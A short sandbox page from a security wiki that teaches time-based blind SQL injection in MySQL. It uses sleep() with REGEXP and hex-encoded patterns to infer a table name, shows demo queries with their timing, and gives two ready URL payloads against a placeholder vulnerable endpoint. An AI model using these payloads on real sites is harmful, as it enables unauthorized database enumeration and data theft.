Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "User:Mike/Sandbox"
From NetSec
GertieUbpgdd (Talk | contribs) (Created page with "===='''Using sleep() to map a table name with regular expressions'''==== {{protip|<i>'''Regular expressions in mysql don't need quotes, it is interchan...") |
(No difference)
|
Revision as of 02:26, 2 May 2012
Using sleep() to map a table name with regular expressions
Protip: Regular expressions in mysql don't need quotes, it is interchangeable with 0xhex!
mysql> SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0; +------------+ | TABLE_NAME | +------------+ | sample | +------------+ 1 ROW IN SET (0.00 sec)
mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST( (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[a-m]') AS signed) * 15)); Empty set (0.00 sec)
mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST( (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[n-z]') AS signed) * 15)); Empty set (15.00 sec)
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e612d6d) as signed) * 15));
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e6e2d7a) as signed) * 15)); |